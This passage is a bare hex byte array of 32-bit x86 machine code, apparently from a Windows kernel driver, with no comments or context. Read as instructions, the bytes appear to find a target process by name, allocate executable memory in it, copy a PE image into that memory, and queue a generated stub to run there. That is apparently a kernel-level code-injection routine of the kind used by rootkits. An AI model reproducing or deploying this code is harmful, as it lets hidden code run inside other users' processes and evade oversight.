0x8b,0x45,0x08,0x50,0x8d,0x4d,0xf8,0x51,0xff,0x15,0x20,0x03,0x00,0x10,0x8b,0x55, 0x10,0xc7,0x02,0x00,0x00,0x00,0x00,0x8b,0x45,0x14,0xc7,0x00,0x00,0x00,0x00,0x00, 0x6a,0x05,0xe8,0xe9,0x16,0x00,0x00,0x89,0x45,0xf0,0x83,0x7d,0xf0,0x00,0x0f,0x84, 0x4d,0x01,0x00,0x00,0x8b,0x4d,0xf0,0x89,0x4d,0xec,0x83,0x7d,0xec,0x00,0x0f,0x84, 0x31,0x01,0x00,0x00,0x8b,0x55,0xec,0x83,0x7a,0x3c,0x00,0x0f,0x84,0x0a,0x01,0x00, 0x00,0x8b,0x45,0xec,0x83,0x78,0x04,0x00,0x0f,0x86,0xfd,0x00,0x00,0x00,0x83,0x7d, 0x08,0x00,0x74,0x1a,0x6a,0x01,0x8d,0x4d,0xf8,0x51,0x8b,0x55,0xec,0x83,0xc2,0x38, 0x52,0xff,0x15,0xa0,0x02,0x00,0x10,0x0f,0xb6,0xc0,0x85,0xc0,0x75,0x19,0x83,0x7d, 0x0c,0x00,0x0f,0x84,0xd3,0x00,0x00,0x00,0x8b,0x4d,0xec,0x8b,0x51,0x44,0x3b,0x55, 0x0c,0x0f,0x85,0xc4,0x00,0x00,0x00,0x8b,0x45,0xec,0x8b,0x48,0x44,0x51,0x8b,0x55, 0xec,0x83,0xc2,0x38,0x52,0x68,0x00,0x04,0x00,0x10,0xe8,0x43,0x17,0x00,0x00,0x83, 0xc4,0x0c,0x8b,0x45,0x10,0x50,0x8b,0x4d,0xec,0x8b,0x91,0xdc,0x00,0x00,0x00,0x52, 0xff,0x15,0x9c,0x02,0x00,0x10,0x89,0x45,0xe8,0x83,0x7d,0xe8,0x00,0x7d,0x11,0x8b, 0x45,0xe8,0x50,0x68,0x28,0x04,0x00,0x10,0xe8,0x15,0x17,0x00,0x00,0x83,0xc4,0x08, 0x8b,0x4d,0x14,0x51,0x8b,0x55,0xec,0x8b,0x42,0x44,0x50,0xff,0x15,0x98,0x02,0x00, 0x10,0x89,0x45,0xe8,0x83,0x7d,0xe8,0x00,0x7d,0x11,0x8b,0x4d,0xe8,0x51,0x68,0x5c, 0x04,0x00,0x10,0xe8,0xea,0x16,0x00,0x00,0x83,0xc4,0x08,0x8b,0x55,0x10,0x83,0x3a, 
0x00,0x74,0x10,0x8b,0x45,0x14,0x83,0x38,0x00,0x74,0x08,0xc6,0x45,0xf7,0x01,0xeb, 0x54,0xeb,0x38,0x8b,0x4d,0x10,0x83,0x39,0x00,0x74,0x14,0x8b,0x55,0x10,0x8b,0x0a, 0xff,0x15,0x94,0x02,0x00,0x10,0x8b,0x45,0x10,0xc7,0x00,0x00,0x00,0x00,0x00,0x8b, 0x4d,0x14,0x83,0x39,0x00,0x74,0x14,0x8b,0x55,0x14,0x8b,0x0a,0xff,0x15,0x94,0x02, 0x00,0x10,0x8b,0x45,0x14,0xc7,0x00,0x00,0x00,0x00,0x00,0x8b,0x4d,0xec,0x83,0x39, 0x00,0x75,0x02,0xeb,0x10,0x8b,0x55,0xec,0x8b,0x45,0xec,0x03,0x02,0x89,0x45,0xec, 0xe9,0xc5,0xfe,0xff,0xff,0x6a,0x00,0x8b,0x4d,0xf0,0x51,0xff,0x15,0x90,0x02,0x00, 0x10,0x8a,0x45,0xf7,0x8b,0xe5,0x5d,0xc2,0x10,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x6a,0xff,0x68,0xe0,0x2c,0x00,0x10,0x68,0x2a,0x2c,0x00,0x10,0x64, 0xa1,0x00,0x00,0x00,0x00,0x50,0x64,0x89,0x25,0x00,0x00,0x00,0x00,0x83,0xc4,0xd8, 0x53,0x56,0x57,0x89,0x65,0xe8,0x8b,0x45,0x0c,0x8b,0x4d,0x0c,0x03,0x48,0x3c,0x89, 0x4d,0xe0,0xc7,0x45,0xd8,0x00,0x00,0x00,0x00,0x8b,0x55,0xe0,0x8b,0x42,0x50,0x89, 0x45,0xdc,0x6a,0x40,0x68,0x00,0x30,0x00,0x00,0x8d,0x4d,0xdc,0x51,0x6a,0x00,0x8d, 0x55,0xd8,0x52,0x8b,0x45,0x08,0x50,0xff,0x15,0xac,0x02,0x00,0x10,0x89,0x45,0xe4, 0x83,0x7d,0xe4,0x00,0x0f,0x8c,0x26,0x01,0x00,0x00,0x8b,0x4d,0xd8,0x51,0x68,0x90, 0x04,0x00,0x10,0xe8,0xea,0x15,0x00,0x00,0x83,0xc4,0x08,0xc7,0x45,0xfc,0x00,0x00, 0x00,0x00,0x8b,0x55,0xdc,0x52,0x6a,0x00,0x8b,0x45,0xd8,0x50,0xe8,0xdd,0x15,0x00, 0x00,0x83,0xc4,0x0c,0x8b,0x4d,0xe0,0x8b,0x51,0x54,0x52,0x8b,0x45,0x0c,0x50,0x8b, 0x4d,0xd8,0x51,0xe8,0xf6,0x15,0x00,0x00,0x83,0xc4,0x0c,0x8b,0x55,0xe0,0x0f,0xb7, 0x42,0x14,0x8b,0x4d,0xe0,0x8d,0x54,0x01,0x18,0x89,0x55,0xd4,0xc7,0x45,0xd0,0x00, 0x00,0x00,0x00,0xeb,0x09,0x8b,0x45,0xd0,0x83,0xc0,0x01,0x89,0x45,0xd0,0x8b,0x4d, 0xe0,0x0f,0xb7,0x51,0x06,0x39,0x55,0xd0,0x73,0x4d,0x8b,0x45,0xd4,0x8b,0x4d,0xd4, 0x8b,0x50,0x10,0x3b,0x51,0x08,0x73,0x0b,0x8b,0x45,0xd4,0x8b,0x48,0x10,0x89,0x4d, 0xcc,0xeb,0x09,0x8b,0x55,0xd4,0x8b,0x42,0x08,0x89,0x45,0xcc,0x8b,0x4d,0xcc,0x51, 
0x8b,0x55,0xd4,0x8b,0x45,0x0c,0x03,0x42,0x14,0x50,0x8b,0x4d,0xd4,0x8b,0x55,0xd8, 0x03,0x51,0x0c,0x52,0xe8,0x85,0x15,0x00,0x00,0x83,0xc4,0x0c,0x8b,0x45,0xd4,0x83, 0xc0,0x28,0x89,0x45,0xd4,0xeb,0x9e,0x8b,0x4d,0xd8,0x51,0x8b,0x55,0xd8,0x52,0xe8, 0x6c,0x12,0x00,0x00,0x0f,0xb6,0xc0,0x85,0xc0,0x74,0x18,0x8b,0x4d,0x14,0x8b,0x55, 0xd8,0x89,0x11,0xc6,0x45,0xcb,0x01,0xc7,0x45,0xfc,0xff,0xff,0xff,0xff,0x8a,0x45, 0xcb,0xeb,0x50,0xc7,0x45,0xfc,0xff,0xff,0xff,0xff,0xeb,0x1d,0xb8,0x01,0x00,0x00, 0x00,0xc3,0x8b,0x65,0xe8,0x68,0xcc,0x04,0x00,0x10,0xe8,0xf3,0x14,0x00,0x00,0x83, 0xc4,0x04,0xc7,0x45,0xfc,0xff,0xff,0xff,0xff,0x68,0x00,0x80,0x00,0x00,0x6a,0x00, 0x8d,0x45,0xd8,0x50,0x8b,0x4d,0x08,0x51,0xff,0x15,0xa4,0x02,0x00,0x10,0xeb,0x11, 0x8b,0x55,0xe4,0x52,0x68,0xec,0x04,0x00,0x10,0xe8,0xc4,0x14,0x00,0x00,0x83,0xc4, 0x08,0x32,0xc0,0x8b,0x4d,0xf0,0x64,0x89,0x0d,0x00,0x00,0x00,0x00,0x5f,0x5e,0x5b, 0x8b,0xe5,0x5d,0xc2,0x10,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x6a,0xff,0x68,0xf0,0x2c,0x00,0x10,0x68,0x2a,0x2c,0x00,0x10,0x64, 0xa1,0x00,0x00,0x00,0x00,0x50,0x64,0x89,0x25,0x00,0x00,0x00,0x00,0x81,0xc4,0x60, 0xff,0xff,0xff,0x53,0x56,0x57,0x89,0x65,0xe8,0xc6,0x45,0xdf,0x00,0xc7,0x45,0xe0, 0x00,0x00,0x00,0x00,0x8d,0x45,0xe0,0x50,0x6a,0x00,0x6a,0x00,0x6a,0x00,0x6a,0x00, 0x68,0x00,0x02,0x00,0x00,0x8b,0x4d,0x08,0x51,0xff,0x15,0x24,0x03,0x00,0x10,0x89, 0x45,0xe4,0x83,0x7d,0xe4,0x00,0x0f,0x8c,0xfc,0x02,0x00,0x00,0x6a,0x00,0x6a,0x18, 0x8d,0x55,0xc4,0x52,0x6a,0x00,0x8b,0x45,0xe0,0x50,0xff,0x15,0xd0,0x02,0x00,0x10, 0x89,0x45,0xe4,0x83,0x7d,0xe4,0x00,0x7d,0x16,0x8b,0x4d,0xe4,0x51,0x68,0x20,0x05, 0x00,0x10,0xe8,0x1b,0x14,0x00,0x00,0x83,0xc4,0x08,0xe9,0xbd,0x02,0x00,0x00,0x8d, 0x55,0xa8,0x52,0x8b,0x45,0x08,0x50,0xff,0x15,0xcc,0x02,0x00,0x10,0x8b,0x4d,0xc8, 0x8b,0x51,0x08,0x89,0x55,0xc0,0xc7,0x45,0xa4,0x00,0x00,0x00,0x00,0x8d,0x45,0xa4, 0x50,0x8b,0x4d,0x14,0x51,0x8b,0x55,0x10,0x52,0x8b,0x45,0xe0,0x50,0xe8,0x7e,0xfd, 
0xff,0xff,0x0f,0xb6,0xc8,0x85,0xc9,0x0f,0x84,0x75,0x02,0x00,0x00,0xc7,0x45,0xfc, 0x00,0x00,0x00,0x00,0x8b,0x55,0x10,0x8b,0x45,0xa4,0x03,0x42,0x3c,0x89,0x45,0x9c, 0x8b,0x4d,0x9c,0x8b,0x55,0xa4,0x03,0x51,0x28,0x89,0x55,0x94,0x8b,0x45,0x94,0x50, 0x68,0x54,0x05,0x00,0x10,0xe8,0xa8,0x13,0x00,0x00,0x83,0xc4,0x08,0xc7,0x45,0x8c, 0x00,0x00,0x00,0x00,0x68,0x80,0x11,0x00,0x10,0xe8,0x22,0xfb,0xff,0xff,0x89,0x45, 0x98,0x8b,0x4d,0x98,0x83,0xc1,0x29,0x89,0x4d,0x90,0x6a,0x40,0x68,0x00,0x30,0x00, 0x00,0x8d,0x55,0x90,0x52,0x6a,0x00,0x8d,0x45,0x8c,0x50,0x8b,0x4d,0xe0,0x51,0xff, 0x15,0xac,0x02,0x00,0x10,0x89,0x45,0xa0,0x83,0x7d,0xa0,0x00,0x0f,0x8c,0xc9,0x01, 0x00,0x00,0x8b,0x55,0x8c,0x52,0x68,0x8c,0x05,0x00,0x10,0xe8,0x52,0x13,0x00,0x00, 0x83,0xc4,0x08,0x8b,0x45,0x90,0x50,0x68,0x90,0x00,0x00,0x00,0x8b,0x4d,0x8c,0x51, 0xe8,0x49,0x13,0x00,0x00,0x83,0xc4,0x0c,0x8b,0x55,0x8c,0xc6,0x02,0x68,0x8b,0x45, 0x8c,0x8b,0x4d,0xa4,0x89,0x48,0x01,0x8b,0x55,0x8c,0xc6,0x42,0x05,0xe8,0x8b,0x45, 0x8c,0x83,0xc0,0x29,0x8b,0x4d,0x8c,0x83,0xc1,0x06,0x2b,0xc1,0x83,0xe8,0x04,0x8b, 0x55,0x8c,0x89,0x42,0x06,0xb8,0x85,0xc0,0x00,0x00,0x8b,0x4d,0x8c,0x66,0x89,0x41, 0x0a,0xba,0x0f,0x84,0x00,0x00,0x8b,0x45,0x8c,0x66,0x89,0x50,0x0c,0x8b,0x4d,0x8c, 0x83,0xc1,0x26,0x8b,0x55,0x8c,0x83,0xc2,0x0e,0x2b,0xca,0x83,0xe9,0x04,0x8b,0x45, 0x8c,0x89,0x48,0x0e,0x8b,0x4d,0x8c,0xc6,0x41,0x12,0x68,0x8b,0x55,0x8c,0xc7,0x42, 0x13,0x00,0x00,0x00,0x00,0x8b,0x45,0x8c,0xc6,0x40,0x17,0x68,0x8b,0x4d,0x8c,0xc7, 0x41,0x18,0x01,0x00,0x00,0x00,0x8b,0x55,0x8c,0xc6,0x42,0x1c,0x68,0x8b,0x45,0x8c, 0x8b,0x4d,0xa4,0x89,0x48,0x1d,0x8b,0x55,0x8c,0xc6,0x42,0x21,0xe8,0x8b,0x45,0x8c, 0x83,0xc0,0x22,0x8b,0x4d,0x94,0x2b,0xc8,0x83,0xe9,0x04,0x8b,0x55,0x8c,0x89,0x4a, 0x22,0x8b,0x45,0x8c,0xc6,0x40,0x26,0xc2,0xb9,0x03,0x00,0x00,0x00,0x8b,0x55,0x8c, 0x66,0x89,0x4a,0x27,0x8b,0x45,0x98,0x50,0x68,0x80,0x11,0x00,0x10,0x8b,0x4d,0x8c, 0x83,0xc1,0x29,0x51,0xe8,0xa5,0x12,0x00,0x00,0x83,0xc4,0x0c,0x8b,0x55,0x0c,0x03, 
0x15,0x80,0x2d,0x00,0x10,0x89,0x55,0x88,0x6a,0x00,0x6a,0x01,0x8b,0x45,0x8c,0x50, 0x6a,0x00,0x68,0xb0,0x13,0x00,0x10,0x6a,0x00,0x8b,0x4d,0x0c,0x51,0x8d,0x95,0x58, 0xff,0xff,0xff,0x52,0xff,0x15,0xc8,0x02,0x00,0x10,0x8b,0x45,0x88,0xc6,0x40,0x16, 0x01,0x6a,0x00,0x6a,0x00,0x6a,0x00,0x8d,0x8d,0x58,0xff,0xff,0xff,0x51,0xff,0x15, 0xc4,0x02,0x00,0x10,0x0f,0xb6,0xd0,0x85,0xd2,0x74,0x71,0xc7,0x85,0x50,0xff,0xff, 0xff,0x80,0x69,0x67,0xff,0xc7,0x85,0x54,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0x8d, 0x85,0x50,0xff,0xff,0xff,0x50,0x6a,0x00,0x6a,0x00,0x6a,0x00,0x68,0xcc,0x2d,0x00, 0x10,0xff,0x15,0xc0,0x02,0x00,0x10,0x89,0x45,0xa0,0x81,0x7d,0xa0,0x02,0x01,0x00, 0x00,0x75,0x0f,0x68,0xac,0x05,0x00,0x10,0xe8,0xd5,0x11,0x00,0x00,0x83,0xc4,0x04, 0xeb,0x17,0x83,0x7d,0xa0,0x00,0x7c,0x11,0x68,0xe0,0x05,0x00,0x10,0xe8,0xc0,0x11, 0x00,0x00,0x83,0xc4,0x04,0xc6,0x45,0xdf,0x01,0x8d,0x8d,0x50,0xff,0xff,0xff,0x51, 0x6a,0x00,0x6a,0x00,0xff,0x15,0xbc,0x02,0x00,0x10,0xeb,0x0d,0x68,0x08,0x06,0x00, 0x10,0xe8,0x9c,0x11,0x00,0x00,0x83,0xc4,0x04,0xeb,0x11,0x8b,0x55,0xa0,0x52,0x68, 0x24,0x06,0x00,0x10,0xe8,0x89,0x11,0x00,0x00,0x83,0xc4,0x08,0xc7,0x45,0xfc,0xff, 0xff,0xff,0xff,0xeb,0x1d,0xb8,0x01,0x00,0x00,0x00,0xc3,0x8b,0x65,0xe8,0x68,0x58, 0x06,0x00,0x10,0xe8,0x6a,0x11,0x00,0x00,0x83,0xc4,0x04,0xc7,0x45,0xfc,0xff,0xff, 0xff,0xff,0x8d,0x45,0xa8,0x50,0xff,0x15,0xb8,0x02,0x00,0x10,0x8b,0x4d,0xe0,0x51, 0xff,0x15,0xb4,0x02,0x00,0x10,0xeb,0x11,0x8b,0x55,0xe4,0x52,0x68,0x78,0x06,0x00, 0x10,0xe8,0x3c,0x11,0x00,0x00,0x83,0xc4,0x08,0x8a,0x45,0xdf,0x8b,0x4d,0xf0,0x64, 0x89,0x0d,0x00,0x00,0x00,0x00,0x5f,0x5e,0x5b,0x8b,0xe5,0x5d,0xc2,0x10,0x00,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x0c,0xc6,0x45,0xff,0x00,0xc7,0x45,0xf4,0x00,0x00,0x00, 0x00,0xc7,0x45,0xf8,0x00,0x00,0x00,0x00,0x8d,0x45,0xf4,0x50,0x8d,0x4d,0xf8,0x51, 0x6a,0x00,0x8b,0x55,0x08,0x52,0xe8,0xf5,0xf8,0xff,0xff,0x0f,0xb6,0xc0,0x85,0xc0, 0x74,0x2c,0x8b,0x4d,0x10,0x51,0x8b,0x55,0x0c,0x52,0x8b,0x45,0xf8,0x50,0x8b,0x4d, 
0xf4,0x51,0xe8,0x39,0xfc,0xff,0xff,0x88,0x45,0xff,0x8b,0x4d,0xf4,0xff,0x15,0x94, 0x02,0x00,0x10,0x8b,0x4d,0xf8,0xff,0x15,0x94,0x02,0x00,0x10,0xeb,0x11,0x8b,0x55, 0x08,0x52,0x68,0xa8,0x06,0x00,0x10,0xe8,0xb6,0x10,0x00,0x00,0x83,0xc4,0x08,0x8a, 0x45,0xff,0x8b,0xe5,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x83,0xec,0x0c,0xc6,0x45,0xff,0x00,0xc7,0x45,0xf4,0x00,0x00,0x00, 0x00,0xc7,0x45,0xf8,0x00,0x00,0x00,0x00,0x8d,0x45,0xf4,0x50,0x8d,0x4d,0xf8,0x51, 0x8b,0x55,0x08,0x52,0x6a,0x00,0xe8,0x75,0xf8,0xff,0xff,0x0f,0xb6,0xc0,0x85,0xc0, 0x74,0x2c,0x8b,0x4d,0x10,0x51,0x8b,0x55,0x0c,0x52,0x8b,0x45,0xf8,0x50,0x8b,0x4d, 0xf4,0x51,0xe8,0xb9,0xfb,0xff,0xff,0x88,0x45,0xff,0x8b,0x4d,0xf4,0xff,0x15,0x94, 0x02,0x00,0x10,0x8b,0x4d,0xf8,0xff,0x15,0x94,0x02,0x00,0x10,0xeb,0x11,0x8b,0x55, 0x08,0x52,0x68,0xe8,0x06,0x00,0x10,0xe8,0x36,0x10,0x00,0x00,0x83,0xc4,0x08,0x8a, 0x45,0xff,0x8b,0xe5,0x5d,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x81,0xec,0x20,0x01,0x00,0x00,0xc7,0x85,0xe0,0xfe,0xff,0xff,0x1c, 0x01,0x00,0x00,0x8d,0x85,0xe0,0xfe,0xff,0xff,0x50,0xff,0x15,0xdc,0x02,0x00,0x10, 0x85,0xc0,0x7d,0x07,0x32,0xc0,0xe9,0x0f,0x01,0x00,0x00,0x83,0xbd,0xe4,0xfe,0xff, 0xff,0x05,0x75,0x22,0x83,0xbd,0xe8,0xfe,0xff,0xff,0x01,0x75,0x19,0xc7,0x05,0xdc, 0x2d,0x00,0x10,0x89,0x00,0x00,0x00,0xc7,0x05,0x80,0x2d,0x00,0x10,0x34,0x00,0x00, 0x00,0xe9,0xbf,0x00,0x00,0x00,0x83,0xbd,0xe4,0xfe,0xff,0xff,0x05,0x75,0x39,0x83, 0xbd,0xe8,0xfe,0xff,0xff,0x02,0x75,0x30,0xc7,0x05,0xdc,0x2d,0x00,0x10,0x8f,0x00, 0x00,0x00,0xc7,0x05,0x80,0x2d,0x00,0x10,0x28,0x00,0x00,0x00,0x0f,0xb7,0x4d,0xf4, 0x85,0xc9,0x75,0x12,0x0f,0xb7,0x55,0xf6,0x85,0xd2,0x75,0x0a,0xc7,0x05,0x80,0x2d, 0x00,0x10,0x34,0x00,0x00,0x00,0xeb,0x7d,0x83,0xbd,0xe4,0xfe,0xff,0xff,0x06,0x75, 0x3b,0x83,0xbd,0xe8,0xfe,0xff,0xff,0x00,0x75,0x32,0x0f,0xb7,0x45,0xf4,0x85,0xc0, 0x75,0x14,0x0f,0xb7,0x4d,0xf6,0x85,0xc9,0x75,0x0c,0xc7,0x05,0xdc,0x2d,0x00,0x10, 
0xcf,0x00,0x00,0x00,0xeb,0x0a,0xc7,0x05,0xdc,0x2d,0x00,0x10,0xd2,0x00,0x00,0x00, 0xc7,0x05,0x80,0x2d,0x00,0x10,0x38,0x00,0x00,0x00,0xeb,0x39,0x83,0xbd,0xe4,0xfe, 0xff,0xff,0x06,0x75,0x1f,0x83,0xbd,0xe8,0xfe,0xff,0xff,0x01,0x75,0x16,0xc7,0x05, 0xdc,0x2d,0x00,0x10,0xd7,0x00,0x00,0x00,0xc7,0x05,0x80,0x2d,0x00,0x10,0x40,0x00, 0x00,0x00,0xeb,0x11,0x68,0x28,0x07,0x00,0x10,0xe8,0x14,0x0f,0x00,0x00,0x83,0xc4, 0x04,0x32,0xc0,0xeb,0x25,0x8b,0x15,0xdc,0x2d,0x00,0x10,0x52,0x68,0x58,0x07,0x00, 0x10,0xe8,0xfc,0x0e,0x00,0x00,0x83,0xc4,0x08,0x6a,0x00,0x6a,0x01,0x68,0xcc,0x2d, 0x00,0x10,0xff,0x15,0xd8,0x02,0x00,0x10,0xb0,0x01,0x8b,0xe5,0x5d,0xc3,0xcc,0xcc, 0x55,0x8b,0xec,0x51,0xff,0x15,0x88,0x02,0x00,0x10,0x89,0x45,0xfc,0x81,0x7d,0xfc, 0x14,0x00,0x06,0x00,0x74,0x15,0x8b,0x45,0xfc,0x50,0x68,0x88,0x07,0x00,0x10,0xe8, 0xbe,0x0e,0x00,0x00,0x83,0xc4,0x08,0x32,0xc0,0xeb,0x5b,0x8b,0x4d,0x08,0x89,0x0d, 0xe0,0x2d,0x00,0x10,0xc7,0x05,0x88,0x2d,0x00,0x10,0x0c,0x00,0x00,0x00,0xc7,0x05, 0x8c,0x2d,0x00,0x10,0x08,0x00,0x00,0x00,0xc7,0x05,0x84,0x2d,0x00,0x10,0x24,0x00, 0x00,0x00,0xc7,0x05,0x90,0x2d,0x00,0x10,0xdc,0x00,0x00,0x00,0xc7,0x05,0x94,0x2d, 0x00,0x10,0x08,0x00,0x00,0x00,0xc7,0x05,0x98,0x2d,0x00,0x10,0xc0,0x01,0x00,0x00, 0xc7,0x05,0x9c,0x2d,0x00,0x10,0x9c,0x01,0x00,0x00,0xc7,0x05,0xa0,0x2d,0x00,0x10, 0x10,0x00,0x00,0x00,0xb0,0x01,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc, 0x55,0x8b,0xec,0x6a,0xff,0x68,0x00,0x2d,0x00,0x10,0x68,0x2a,0x2c,0x00,0x10,0x64, 0xa1,0x00,0x00,0x00,0x00,0x50,0x64,0x89,0x25,0x00,0x00,0x00,0x00,0x83,0xc4,0xcc, 0x53,0x56,0x57,0xc7,0x45,0xe0,0x00,0x00,0x00,0x00,0xc7,0x45,0xfc,0x00,0x00,0x00, 0x00,0x8b,0x45,0x10,0xc7,0x00,0x00,0x00,0x00,0x00,0x8b,0x4d,0x08,0x8b,0x51,0x04, 0x89,0x55,0xe4,0xeb,0x08,0x8b,0x45,0xe4,0x8b,0x08,0x89,0x4d,0xe4,0x83,0x7d,0xe4, 0x00,0x0f,0x84,0xa2,0x02,0x00,0x00,0x8b,0x55,0xe4,0x8b,0x42,0x04,0x89,0x45,0xd8, 0x8b,0x4d,0xd8,0x0f,0xbf,0x51,0x06,0x83,0xe2,0x05,0x74,0x0b,0x8b,0x45,0xd8,0x8b, 
0x48,0x0c,0x89,0x4d,0xc0,0xeb,0x17,0x6a,0x10,0x6a,0x00,0x6a,0x00,0x6a,0x01,0x6a, 0x00,0x8b,0x55,0xd8,0x52,0xff,0x15,0xe4,0x02,0x00,0x10,0x89,0x45,0xc0,0x8b,0x45, 0xc0,0x89,0x45,0xd4,0x83,0x7d,0xd4,0x00,0x75,0x2a,0x8b,0x4d,0x0c,0x83,0x39,0x00, 0x74,0x16,0x8b,0x55,0x10,0x83,0x3a,0x00,0x76,0x0e,0x6a,0x00,0x8b,0x45,0x0c,0x8b, 0x08,0x51,0xff,0x15,0x90,0x02,0x00,0x10,0xc7,0x45,0xe0,0x9a,0x00,0x00,0xc0,0xe9, 0x35,0x02,0x00,0x00,0x8b,0x55,0xe4,0x8b,0x45,0xd4,0x03,0x42,0x08,0x89,0x45,0xd4, 0x8b,0x4d,0xd8,0x8b,0x55,0xe4,0x8b,0x41,0x14,0x2b,0x42,0x08,0x89,0x45,0xdc,0x83, 0x7d,0xdc,0x00,0x0f,0x8e,0xbc,0x00,0x00,0x00,0x8b,0x4d,0x10,0x8b,0x11,0x03,0x55, 0xdc,0x89,0x55,0xd0,0x8b,0x45,0xd0,0x50,0x6a,0x00,0xff,0x15,0xe0,0x02,0x00,0x10, 0x89,0x45,0xcc,0x83,0x7d,0xcc,0x00,0x74,0x59,0x8b,0x4d,0x0c,0x83,0x39,0x00,0x74, 0x2e,0x8b,0x55,0x10,0x83,0x3a,0x00,0x76,0x26,0x8b,0x45,0x10,0x8b,0x08,0x51,0x8b, 0x55,0x0c,0x8b,0x02,0x50,0x8b,0x4d,0xcc,0x51,0xe8,0x60,0x0d,0x00,0x00,0x83,0xc4, 0x0c,0x6a,0x00,0x8b,0x55,0x0c,0x8b,0x02,0x50,0xff,0x15,0x90,0x02,0x00,0x10,0x8b, 0x4d,0xdc,0x51,0x8b,0x55,0xd4,0x52,0x8b,0x45,0x10,0x8b,0x4d,0xcc,0x03,0x08,0x51, 0xe8,0x39,0x0d,0x00,0x00,0x83,0xc4,0x0c,0x8b,0x55,0x0c,0x8b,0x45,0xcc,0x89,0x02, 0xeb,0x2a,0x8b,0x4d,0x0c,0x83,0x39,0x00,0x74,0x16,0x8b,0x55,0x10,0x83,0x3a,0x00, 0x76,0x0e,0x6a,0x00,0x8b,0x45,0x0c,0x8b,0x08,0x51,0xff,0x15,0x90,0x02,0x00,0x10, 0xc7,0x45,0xe0,0x9a,0x00,0x00,0xc0,0xe9,0x6d,0x01,0x00,0x00,0x8b,0x55,0x10,0x8b, 0x02,0x03,0x45,0xdc,0x8b,0x4d,0x10,0x89,0x01,0x8b,0x55,0xdc,0x8b,0x45,0x0c,0x8d, 0x0c,0x90,0x89,0x4d,0x0c,0x8b,0x55,0xd8,0x8b,0x02,0x89,0x45,0xd8,0x83,0x7d,0xd8, 0x00,0x0f,0x84,0x3d,0x01,0x00,0x00,0x8b,0x4d,0xd8,0x0f,0xbf,0x51,0x06,0x83,0xe2, 0x05,0x74,0x0b,0x8b,0x45,0xd8,0x8b,0x48,0x0c,0x89,0x4d,0xbc,0xeb,0x17,0x6a,0x10, 0x6a,0x00,0x6a,0x00,0x6a,0x01,0x6a,0x00,0x8b,0x55,0xd8,0x52,0xff,0x15,0xe4,0x02, 0x00,0x10,0x89,0x45,0xbc,0x8b,0x45,0xbc,0x89,0x45,0xd4,0x83,0x7d,0xd4,0x00,0x75, 
0x2a,0x8b,0x4d,0x0c,0x83,0x39,0x00,0x74,0x16,0x8b,0x55,0x10,0x83,0x3a,0x00,0x76, 0x0e,0x6a,0x00,0x8b,0x45,0x0c,0x8b,0x08,0x51,0xff,0x15,0x90,0x02,0x00,0x10,0xc7, 0x45,0xe0,0x9a,0x00,0x00,0xc0,0xe9,0xde,0x00,0x00,0x00,0x8b,0x55,0xd8,0x8b,0x42, 0x14,0x89,0x45,0xdc,0x83,0x7d,0xdc,0x00,0x0f,0x8e,0xb9,0x00,0x00,0x00,0x8b,0x4d, 0x10,0x8b,0x11,0x03,0x55,0xdc,0x89,0x55,0xc8,0x8b,0x45,0xc8,0x50,0x6a,0x00,0xff, 0x15,0xe0,0x02,0x00,0x10,0x89,0x45,0xc4,0x83,0x7d,0xc4,0x00,0x74,0x59,0x8b,0x4d, 0x0c,0x83,0x39,0x00,0x74,0x2e,0x8b,0x55,0x10,0x83,0x3a,0x00,0x76,0x26,0x8b,0x45, 0x10,0x8b,0x08,0x51,0x8b,0x55,0x0c,0x8b,0x02,0x50,0x8b,0x4d,0xc4,0x51,0xe8,0x1b, 0x0c,0x00,0x00,0x83,0xc4,0x0c,0x6a,0x00,0x8b,0x55,0x0c,0x8b,0x02,0x50,0xff,0x15, 0x90,0x02,0x00,0x10,0x8b,0x4d,0xdc,0x51,0x8b,0x55,0xd4,0x52,0x8b,0x45,0x10,0x8b, 0x4d,0xc4,0x03,0x08,0x51,0xe8,0xf4,0x0b,0x00,0x00,0x83,0xc4,0x0c,0x8b,0x55,0x0c, 0x8b,0x45,0xc4,0x89,0x02,0xeb,0x27,0x8b,0x4d,0x0c,0x83,0x39,0x00,0x74,0x16,0x8b, 0x55,0x10,0x83,0x3a,0x00,0x76,0x0e,0x6a,0x00,0x8b,0x45,0x0c,0x8b,0x08,0x51,0xff, 0x15,0x90,0x02,0x00,0x10,0xc7,0x45,0xe0,0x9a,0x00,0x00,0xc0,0xeb,0x2b,0x8b,0x55, 0x10,0x8b,0x02,0x03,0x45,0xdc,0x8b,0x4d,0x10,0x89,0x01,0x8b,0x55,0xdc,0x8b,0x45, 0x0c,0x8d,0x0c,0x90,0x89,0x4d,0x0c,0x8b,0x55,0xd8,0x8b,0x02,0x89,0x45,0xd8,0xe9, 0xb9,0xfe,0xff,0xff,0xe9,0x4c,0xfd,0xff,0xff,0xc7,0x45,0xfc,0xff,0xff,0xff,0xff, 0xe8,0x02,0x00,0x00,0x00,0xeb,0x01,0xc3,0x8b,0x45,0xe0,0x8b,0x4d,0xf0,0x64,0x89, 0x0d,0x00,0x00,0x00,0x00,0x5f,0x5e,0x5b,0x8b,0xe5,0x5d,0xc2,0x0c,0x00,0xcc,0xcc, 0x55,0x8b,0xec,0x51,0x6a,0x12,0x6a,0x00,0xff,0x15,0xe0,0x02,0x00,0x10,0x89,0x45, 0xfc,0x83,0x7d,0xfc,0x00,0x74,0x44,0x8b,0x45,0xfc,0xc6,0x00,0x58,0x8b,0x4d,0xfc, 0xc6,0x41,0x01,0x68,0x8b,0x55,0xfc,0x8b,0x45,0x08,0x89,0x42,0x02,0x8b,0x4d,0xfc, 0xc6,0x41,0x06,0x68,0x8b,0x55,0xfc,0x8b,0x45,0x0c,0x89,0x42,0x07,0x8b,0x4d,0xfc, 0xc6,0x41,0x0b,0x50,0x8b,0x55,0xfc,0xc6,0x42,0x0c,0x68,0x8b,0x45,0xfc,0x8b,0x4d, 
